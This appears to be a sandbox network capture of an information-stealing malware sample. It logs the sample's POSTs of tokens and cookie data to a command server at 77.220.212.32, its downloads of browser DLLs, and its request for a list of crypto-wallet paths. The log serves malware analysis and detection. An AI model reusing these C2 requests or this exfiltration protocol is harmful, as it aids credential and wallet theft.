Nov 9, 2024 02:47:22.418508053 CET	563	OUT	POST /eb51242cada87444.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDAAFBGDBKJJJKFIIIJJ Host: 77.220.212.32 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 66 37 66 37 32 65 64 65 35 32 36 63 30 62 64 31 61 62 65 31 39 64 32 38 33 38 65 37 61 30 36 31 31 63 37 61 33 61 65 39 31 38 37 37 65 36 66 39 33 63 37 34 62 30 64 37 31 34 64 36 33 33 36 62 32 63 30 38 66 33 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="token"47f7f72ede526c0bd1abe19d2838e7a0611c7a3ae91877e6f93c74b0d714d6336b2c08f3------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="file"------IDAAFBGDBKJJJKFIIIJJ--
Nov 9, 2024 02:47:22.880402088 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	52982	77.220.212.32	80	6396	C:\Users\user\Desktop\HrxOpVxK5d.exe

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 02:47:30.770186901 CET	201	OUT	POST /eb51242cada87444.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIIDBKJJDGHDHJKEHJDB Host: 77.220.212.32 Content-Length: 3087 Connection: Keep-Alive Cache-Control: no-cache
Nov 9, 2024 02:47:30.770242929 CET	3087	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 66 37 66 37 Data Ascii: ------FIIDBKJJDGHDHJKEHJDBContent-Disposition: form-data; name="token"47f7f72ede526c0bd1abe19d2838e7a0611c7a3ae91877e6f93c74b0d714d6336b2c08f3------FIIDBKJJDGHDHJKEHJDBContent-Disposition: form-data; name="file_name"Y29va2llc1xNa
Nov 9, 2024 02:47:31.873521090 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 9, 2024 02:47:32.010685921 CET	563	OUT	POST /eb51242cada87444.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJEBKKEGDBFIIEBFHIEH Host: 77.220.212.32 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 66 37 66 37 32 65 64 65 35 32 36 63 30 62 64 31 61 62 65 31 39 64 32 38 33 38 65 37 61 30 36 31 31 63 37 61 33 61 65 39 31 38 37 37 65 36 66 39 33 63 37 34 62 30 64 37 31 34 64 36 33 33 36 62 32 63 30 38 66 33 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------IJEBKKEGDBFIIEBFHIEHContent-Disposition: form-data; name="token"47f7f72ede526c0bd1abe19d2838e7a0611c7a3ae91877e6f93c74b0d714d6336b2c08f3------IJEBKKEGDBFIIEBFHIEHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IJEBKKEGDBFIIEBFHIEHContent-Disposition: form-data; name="file"------IJEBKKEGDBFIIEBFHIEH--
Nov 9, 2024 02:47:32.441616058 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 9, 2024 02:47:33.304440975 CET	92	OUT	GET /241bc8c289ca83f4/freebl3.dll HTTP/1.1 Host: 77.220.212.32 Cache-Control: no-cache
Nov 9, 2024 02:47:33.541290045 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:33 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "a7550-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Nov 9, 2024 02:47:33.541316032 CET	212	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]
Nov 9, 2024 02:47:33.541332960 CET	1236	IN	Data Raw: cc cc cc cc 55 89 e5 53 57 56 68 4f 01 00 00 e8 3f 0b 08 00 83 c4 04 85 c0 74 30 89 c7 89 80 38 01 00 00 83 c7 0f 31 f6 83 e7 f0 74 6b 8b 45 14 8b 55 10 8b 5d 0c 8b 4d 08 85 db 74 1f f2 0f 10 03 f2 0f 11 87 30 01 00 00 eb 25 68 13 e0 ff ff e8 f2 Data Ascii: USWVhO?t081tkEU]Mt0%h1<40jRjjPQWt8^_[]UWVut }jVt8h^_]USWVPL$,M01D$H
Nov 9, 2024 02:47:33.541356087 CET	1236	IN	Data Raw: 0c 89 c1 c1 e9 18 89 4c 24 10 c7 44 24 1c 00 00 00 00 89 44 24 08 c7 44 24 24 00 00 00 00 c7 44 24 20 00 00 00 00 31 d2 31 c9 89 5c 24 28 eb 24 89 c7 8b 44 24 1c 83 c0 01 83 f8 06 8b 54 24 18 8b 4c 24 14 0f 84 e2 01 00 00 89 44 24 1c 8a 44 24 07 Data Ascii: L$D$D$D$$D$ 11\$($D$T$L$D$D$t$8D$D$@L$T$\|$ L$$\$\$T$1%1%1T$D\|$@\|$t\$
Nov 9, 2024 02:47:33.541398048 CET	1236	IN	Data Raw: 89 d9 0f b6 5d e7 09 d8 89 4d d4 29 c1 09 ca c1 fa 1f f7 db 83 e3 07 31 ff 39 d9 f7 d2 0f 44 fa 89 45 d0 89 45 dc 89 ca f7 da c1 fa 1f f7 d2 8b 45 1c 80 7c 30 f7 01 19 db 09 d3 b8 01 00 00 00 29 c8 c1 f8 1f 8b 55 1c 80 7c 32 f6 01 19 d2 f7 d0 09 Data Ascii: ]M)19DEEE\|0)U\|2!!)]\|3)\|3!)}\|7!!)U\|2)\|2!!)M\|1t/E
Nov 9, 2024 02:47:33.541423082 CET	636	IN	Data Raw: cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 68 0c 01 00 00 e8 bf fc 07 00 83 c4 04 31 f6 85 c0 74 6c 89 c7 8b 45 08 c7 47 08 00 00 00 00 89 47 04 8b 48 04 ff 15 00 80 0a 10 ff d1 89 07 85 c0 74 31 8b 55 0c 89 f9 ff 75 14 ff 75 10 e8 17 fd ff ff 83 Data Ascii: USWVh1tlEGGHt1Uuut,tGHjSGW:G^_[]USWVUM]u>F9t:NVFMUtHHjWhjV4%t
Nov 9, 2024 02:47:33.541440964 CET	1236	IN	Data Raw: ff d1 83 c4 0c 8b 37 8b 47 04 8b 48 14 8b 45 10 8b 18 ff 15 00 80 0a 10 53 8b 5d 0c 53 56 ff d1 83 c4 0c 8b 37 8b 47 04 8b 48 18 ff 15 00 80 0a 10 ff 75 14 ff 75 10 53 56 ff d1 83 c4 10 31 c0 83 c4 04 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 Data Ascii: 7GHES]SV7GHuuSV1^_[]USWVPh1tq]@CFECHut7FKSrQP;KqSPVi^_[]Uh
Nov 9, 2024 02:47:33.541455030 CET	212	IN	Data Raw: 04 02 0f b6 c8 8b 7d f0 8a 14 0f 00 d6 0f b6 f6 8a 24 37 88 24 0f 88 14 37 8b 75 14 00 d4 0f b6 cc 8b 5d 10 8a 53 01 32 14 0f 8b 4d e4 88 51 01 83 fe 02 0f 84 e8 00 00 00 8b 45 ec 04 03 0f b6 c8 8b 7d f0 8a 14 0f 00 d6 0f b6 f6 8a 24 37 88 24 0f Data Ascii: }$7$7u]S2MQE}$7$7u]S2MQE}$7$7u]S2MQttE}$7$7u]
Nov 9, 2024 02:47:33.541547060 CET	1236	IN	Data Raw: 8a 53 04 32 14 0f 8b 4d e4 88 51 04 83 fe 05 74 3c 8b 45 ec 04 06 0f b6 c8 8b 7d f0 8a 14 0f 00 d6 0f b6 f6 8a 24 37 88 24 0f 88 14 37 8b 75 14 00 d4 0f b6 cc 8b 5d 10 8a 53 05 32 14 0f 8b 5d e4 88 53 05 83 fe 06 0f 85 9c 08 00 00 89 c1 8b 45 08 Data Ascii: S2MQt<E}$7$7u]S2]SEu0EMME)us) }) )}})])EU]EM]U$U<2U<U$2M!
Nov 9, 2024 02:47:33.541559935 CET	212	IN	Data Raw: d4 66 0f eb ca 66 0f 70 c1 ee 66 0f eb c1 66 0f 70 c8 55 66 0f eb c8 66 0f 7e 4d e0 8b 55 c8 39 55 d4 8b 45 d0 75 0e 8a 55 e8 8b 4d ec 8b 7d e4 8b 5d dc eb 3f 8d 0c d5 00 00 00 00 8b 75 10 03 75 cc 8b 5d d4 8b 7d e0 0f 1f 84 00 00 00 00 00 0f b6 Data Ascii: ffpffpUff~MU9UEuUM}]?uu]}9u}UM}]Et5UM9M]]}<+ET}:M1}]fE
Nov 9, 2024 02:47:34.307563066 CET	92	OUT	GET /241bc8c289ca83f4/mozglue.dll HTTP/1.1 Host: 77.220.212.32 Cache-Control: no-cache
Nov 9, 2024 02:47:34.544661045 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:34 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "94750-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Nov 9, 2024 02:47:34.966439962 CET	93	OUT	GET /241bc8c289ca83f4/msvcp140.dll HTTP/1.1 Host: 77.220.212.32 Cache-Control: no-cache
Nov 9, 2024 02:47:35.204292059 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:35 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "6dde8-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Nov 9, 2024 02:47:35.386975050 CET	89	OUT	GET /241bc8c289ca83f4/nss3.dll HTTP/1.1 Host: 77.220.212.32 Cache-Control: no-cache
Nov 9, 2024 02:47:35.625868082 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:35 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "1f3950-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Nov 9, 2024 02:47:36.589802027 CET	93	OUT	GET /241bc8c289ca83f4/softokn3.dll HTTP/1.1 Host: 77.220.212.32 Cache-Control: no-cache
Nov 9, 2024 02:47:36.826996088 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:36 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "3ef50-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Nov 9, 2024 02:47:37.014372110 CET	97	OUT	GET /241bc8c289ca83f4/vcruntime140.dll HTTP/1.1 Host: 77.220.212.32 Cache-Control: no-cache
Nov 9, 2024 02:47:37.251085043 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:37 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "13bf0-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Nov 9, 2024 02:47:38.334975958 CET	201	OUT	POST /eb51242cada87444.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAEGCGCGIEGDHIDHJJEH Host: 77.220.212.32 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Nov 9, 2024 02:47:38.940082073 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 9, 2024 02:47:39.009259939 CET	467	OUT	POST /eb51242cada87444.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKE Host: 77.220.212.32 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 66 37 66 37 32 65 64 65 35 32 36 63 30 62 64 31 61 62 65 31 39 64 32 38 33 38 65 37 61 30 36 31 31 63 37 61 33 61 65 39 31 38 37 37 65 36 66 39 33 63 37 34 62 30 64 37 31 34 64 36 33 33 36 62 32 63 30 38 66 33 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 2d 2d 0d 0a Data Ascii: ------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="token"47f7f72ede526c0bd1abe19d2838e7a0611c7a3ae91877e6f93c74b0d714d6336b2c08f3------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="message"wallets------IIJEBFCFIJJJEBGDBAKE--
Nov 9, 2024 02:47:39.249027014 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:39 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: 